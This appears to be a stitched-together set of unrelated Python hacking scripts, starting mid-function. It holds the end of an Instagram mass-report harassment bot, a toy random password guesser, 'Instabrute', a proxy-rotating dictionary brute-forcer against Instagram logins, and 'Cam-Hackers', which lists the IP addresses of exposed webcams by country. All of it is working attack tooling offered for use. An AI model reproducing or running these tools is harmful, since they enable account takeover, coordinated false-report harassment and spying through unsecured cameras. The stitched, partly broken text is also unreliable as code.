                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            else:
                z +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            sleep(0.5)
        for i in range(R8):
            url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
            data1 = {'source_name':'','reason_id':'8','frx_context':''}
            report = r.post(url1,data=data1)
            if '"status": "ok"' in report.text:
                h +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            else:
                z +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            sleep(0.5)
        url_out = 'https://www.instagram.com/accounts/logout/ajax/'
        data_out = {
            'one_tap_app_login': '0'
        }
        hed_out = {
            "user-agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36",
            'x-csrftoken': csrf_token,
            'mid': cookie
        }
        sleep(2)
        logout = r.post(url_out, headers=hed_out, data=data_out)
        if logout.status_code == 200:
            pass
        else:
            print(R+f'[!] Error In logout from [{username}:{passwors}]'+Style.RESET_ALL)
            
# taking input from user
user_pass = input("Enter word from 4 to 10 letters: ")

# storing alphabet letter to use thm to crack password
password = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j','k', 
            'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't','u','v', 
            'w', 'x', 'y', 'z',]

# initializing an empty string
guess = ""


# using while loop to generate many passwords untill one of
# them does not matches user_pass
while (guess != user_pass):
    guess = ""
    # generating random passwords using for loop
    for letter in range(len(user_pass)):
        guess_letter = password[randint(0, 25)]
        guess = str(guess_letter) + str(guess)
    # printing guessed passwords
    print(guess)
    
# printing the matched password
print("the user name is",guess)
print(r)
print("try it")


'''
TODO LIST:
	Fix and make proxy function better
	Sort code again
	Add help function to all "Yes/no" questions
	Add help  function to "Press enter to exit input"
'''
import requests
import json
import time
import os
import random
import sys

#Help function
def Input(text):
	value = ''
	if sys.version_info.major > 2:
		value = input(text)
	else:
		value = raw_input(text)
	return str(value)

#The main class
class Instabrute():
	def __init__(self, username, passwordsFile='pass.txt'):
		self.username = username
		self.CurrentProxy = ''
		self.UsedProxys = []
		self.passwordsFile = passwordsFile
		
		#Check if passwords file exists
		self.loadPasswords()
		#Check if username exists
		self.IsUserExists()


		UsePorxy = Input('[*] Do you want to use proxy (y/n): ').upper()
		if (UsePorxy == 'Y' or UsePorxy == 'YES'):
			self.randomProxy()


	#Check if password file exists and check if he contain passwords
	def loadPasswords(self):
		if os.path.isfile(self.passwordsFile):
			with open(self.passwordsFile) as f:
				self.passwords = f.read().splitlines()
				passwordsNumber = len(self.passwords)
				if (passwordsNumber > 0):
					print ('[*] %s Passwords loads successfully' % passwordsNumber)
				else:
					print('Password file are empty, Please add passwords to it.')
					Input('[*] Press enter to exit')
					exit()
		else:
			print ('Please create passwords file named "%s"' % self.passwordsFile)
			Input('[*] Press enter to exit')
			exit()

	#Choose random proxy from proxys file
	def randomProxy(self):
		plist = open('proxy.txt').read().splitlines()
		proxy = random.choice(plist)

		if not proxy in self.UsedProxys:
			self.CurrentProxy = proxy
			self.UsedProxys.append(proxy)
		try:
			print('')
			print('[*] Check new ip...')
			print ('[*] Your public ip: %s' % requests.get('http://myexternalip.com/raw', proxies={ "http": proxy, "https": proxy },timeout=10.0).text)
		except Exception as e:
			print  ('[*] Can\'t reach proxy "%s"' % proxy)
		print('')


	#Check if username exists in instagram server
	def IsUserExists(self):
		r = requests.get('https://www.instagram.com/%s/?__a=1' % self.username) 
		if (r.status_code == 404):
			print ('[*] User named "%s" not found' % username)
			Input('[*] Press enter to exit')
			exit()
		elif (r.status_code == 200):
			return True

	#Try to login with password
	def Login(self, password):
		sess = requests.Session()

		if len(self.CurrentProxy) > 0:
			sess.proxies = { "http": self.CurrentProxy, "https": self.CurrentProxy }

		#build requests headers
		sess.cookies.update ({'sessionid' : '', 'mid' : '', 'ig_pr' : '1', 'ig_vw' : '1920', 'csrftoken' : '',  's_network' : '', 'ds_user_id' : ''})
		sess.headers.update({
			'UserAgent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
			'x-instagram-ajax':'1',
			'X-Requested-With': 'XMLHttpRequest',
			'origin': 'https://www.instagram.com',
			'ContentType' : 'application/x-www-form-urlencoded',
			'Connection': 'keep-alive',
			'Accept': '*/*',
			'Referer': 'https://www.instagram.com',
			'authority': 'www.instagram.com',
			'Host' : 'www.instagram.com',
			'Accept-Language' : 'en-US;q=0.6,en;q=0.4',
			'Accept-Encoding' : 'gzip, deflate'
		})

		#Update token after enter to the site
		r = sess.get('https://www.instagram.com/') 
		sess.headers.update({'X-CSRFToken' : r.cookies.get_dict()['csrftoken']})

		#Update token after login to the site 
		r = sess.post('https://www.instagram.com/accounts/login/ajax/', data={'username':self.username, 'password':password}, allow_redirects=True)
		sess.headers.update({'X-CSRFToken' : r.cookies.get_dict()['csrftoken']})
		
		#parse response
		data = json.loads(r.text)
		if (data['status'] == 'fail'):
			print (data['message'])

			UsePorxy = Input('[*] Do you want to use proxy (y/n): ').upper()
			if (UsePorxy == 'Y' or UsePorxy == 'YES'):
				print ('[$] Try to use proxy after fail.')
				randomProxy() #Check that, may contain bugs
			return False

		#return session if password is correct 
		if (data['authenticated'] == True):
			return sess 
		else:
			return False






instabrute = Instabrute(Input('Please enter a username: '))

try:
	delayLoop = int(Input('[*] Please add delay between the bruteforce action (in seconds): ')) 
except Exception as e:
	print ('[*] Error, software use the defult value "4"')
	delayLoop = 4
print ('')



for password in instabrute.passwords:
	sess = instabrute.Login(password)
	if sess:
		print ('[*] Login success %s' % [instabrute.username,password])
	else:
		print ('[*] Password incorrect [%s]' % password)

	try:
		time.sleep(delayLoop)
	except KeyboardInterrupt:
		WantToExit = str(Input('Type y/n to exit: ')).upper()
		if (WantToExit == 'Y' or WantToExit == 'YES'):
			exit()
		else:
			continue
		
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
#github.com/AngelSecurityTeam/Cam-Hackers

import requests, re , colorama
colorama.init()
print("""
\033[1;31m\033[1;37m ██████╗ █████╗ ███╗   ███╗      ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ ███████╗
██╔════╝██╔══██╗████╗ ████║      ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝
██║     ███████║██╔████╔██║█████╗███████║███████║██║     █████╔╝ █████╗  ██████╔╝███████╗
██║     ██╔══██║██║╚██╔╝██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗╚════██║
╚██████╗██║  ██║██║ ╚═╝ ██║      ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██║  ██║███████║
\033[1;31m ╚═════╝╚═╝  ╚═╝╚═╝     ╚═╝      ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝
\033[1;31m                                                                        ANGELSECURITYTEAM 
\033[1;31m1) \033[1;37mUnited States                \033[1;31m31) \033[1;37mMexico                \033[1;31m61) \033[1;37mMoldova
\033[1;31m2) \033[1;37mJapan                        \033[1;31m32) \033[1;37mFinland               \033[1;31m62) \033[1;37mNicaragua
\033[1;31m3) \033[1;37mItaly                        \033[1;31m33) \033[1;37mChina                 \033[1;31m63) \033[1;37mMalta
\033[1;31m4) \033[1;37mKorea                        \033[1;31m34) \033[1;37mChile                 \033[1;31m64) \033[1;37mTrinidad And Tobago
\033[1;31m5) \033[1;37mFrance                       \033[1;31m35) \033[1;37mSouth Africa          \033[1;31m65) \033[1;37mSoudi Arabia
\033[1;31m6) \033[1;37mGermany                      \033[1;31m36) \033[1;37mSlovakia              \033[1;31m66) \033[1;37mCroatia
\033[1;31m7) \033[1;37mTaiwan                       \033[1;31m37) \033[1;37mHungary               \033[1;31m67) \033[1;37mCyprus
\033[1;31m8) \033[1;37mRussian Federation           \033[1;31m38) \033[1;37mIreland               \033[1;31m68) \033[1;37mPakistan
\033[1;31m9) \033[1;37mUnited Kingdom               \033[1;31m39) \033[1;37mEgypt                 \033[1;31m69) \033[1;37mUnited Arab Emirates
\033[1;31m10) \033[1;37mNetherlands                 \033[1;31m40) \033[1;37mThailand              \033[1;31m70) \033[1;37mKazakhstan
\033[1;31m11) \033[1;37mCzech Republic              \033[1;31m41) \033[1;37mUkraine               \033[1;31m71) \033[1;37mKuwait
\033[1;31m12) \033[1;37mTurkey                      \033[1;31m42) \033[1;37mSerbia                \033[1;31m72) \033[1;37mVenezuela
\033[1;31m13) \033[1;37mAustria                     \033[1;31m43) \033[1;37mHong Kong             \033[1;31m73) \033[1;37mGeorgia
\033[1;31m14) \033[1;37mSwitzerland                 \033[1;31m44) \033[1;37mGreece                \033[1;31m74) \033[1;37mMontenegro
\033[1;31m15) \033[1;37mSpain                       \033[1;31m45) \033[1;37mPortugal              \033[1;31m75) \033[1;37mEl Salvador
\033[1;31m16) \033[1;37mCanada                      \033[1;31m46) \033[1;37mLatvia                \033[1;31m76) \033[1;37mLuxembourg
\033[1;31m17) \033[1;37mSweden                      \033[1;31m47) \033[1;37mSingapore             \033[1;31m77) \033[1;37mCuracao
\033[1;31m18) \033[1;37mIsrael                      \033[1;31m48) \033[1;37mIceland               \033[1;31m78) \033[1;37mPuerto Rico
\033[1;31m19) \033[1;37mIran                        \033[1;31m49) \033[1;37mMalaysia              \033[1;31m79) \033[1;37mCosta Rica
\033[1;31m20) \033[1;37mPoland                      \033[1;31m50) \033[1;37mColombia              \033[1;31m80) \033[1;37mBelarus
\033[1;31m21) \033[1;37mIndia                       \033[1;31m51) \033[1;37mTunisia               \033[1;31m81) \033[1;37mAlbania
\033[1;31m22) \033[1;37mNorway                      \033[1;31m52) \033[1;37mEstonia               \033[1;31m82) \033[1;37mLiechtenstein
\033[1;31m23) \033[1;37mRomania                     \033[1;31m53) \033[1;37mDominican Republic    \033[1;31m83) \033[1;37mBosnia And Herzegovia
\033[1;31m24) \033[1;37mViet Nam                    \033[1;31m54) \033[1;37mSloveania             \033[1;31m84) \033[1;37mParaguay
\033[1;31m25) \033[1;37mBelgium                     \033[1;31m55) \033[1;37mEcuador               \033[1;31m85) \033[1;37mPhilippines
\033[1;31m26) \033[1;37mBrazil                      \033[1;31m56) \033[1;37mLithuania             \033[1;31m86) \033[1;37mFaroe Islands
\033[1;31m27) \033[1;37mBulgaria                    \033[1;31m57) \033[1;37mPalestinian           \033[1;31m87) \033[1;37mGuatemala
\033[1;31m28) \033[1;37mIndonesia                   \033[1;31m58) \033[1;37mNew Zealand           \033[1;31m88) \033[1;37mNepal
\033[1;31m29) \033[1;37mDenmark                     \033[1;31m59) \033[1;37mBangladeh             \033[1;31m89) \033[1;37mPeru
\033[1;31m30) \033[1;37mArgentina                   \033[1;31m60) \033[1;37mPanama                \033[1;31m90) \033[1;37mUruguay
                                                          \033[1;31m91) \033[1;37mExtra
""")

try:
    print()
    countries = ["US", "JP", "IT", "KR", "FR", "DE", "TW", "RU", "GB", "NL",
                 "CZ", "TR", "AT", "CH", "ES", "CA", "SE", "IL", "PL", "IR",
                 "NO", "RO", "IN", "VN", "BE", "BR", "BG", "ID", "DK", "AR",
                 "MX", "FI", "CN", "CL", "ZA", "SK", "HU", "IE", "EG", "TH",
                 "UA", "RS", "HK", "GR", "PT", "LV", "SG", "IS", "MY", "CO",
                 "TN", "EE", "DO", "SI", "EC", "LT", "PS", "NZ", "BD", "PA",
                 "MD", "NI", "MT", "IT", "SA", "HR", "CY", "PK", "AE", "KZ",
                 "KW", "VE", "GE", "ME", "SV", "LU", "CW", "PR", "CR", "BY",
                 "AL", "LI", "BA", "PY", "PH", "FO", "GT", "NP", "PE", "UY",
                 "-"]
    headers = {"User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0"}

    num = int(input("OPTIONS : "))
    if num not in range(1, 91+1):
        raise IndexError

    country = countries[num-1]
    res = requests.get(
        f"https://www.insecam.org/en/bycountry/{country}", headers=headers
    )
    last_page = re.findall(r'pagenavigator\("\?page=", (\d+)', res.text)[0]

    for page in range(int(last_page)):
        res = requests.get(
            f"https://www.insecam.org/en/bycountry/{country}/?page={page}",
            headers=headers
        )
        find_ip = re.findall(r"http://\d+.\d+.\d+.\d+:\d+", res.text)
        for ip in find_ip:
            print("\033[1;31m", ip)
except:
    pass
finally:
    print("\033[1;37m")
    exit()

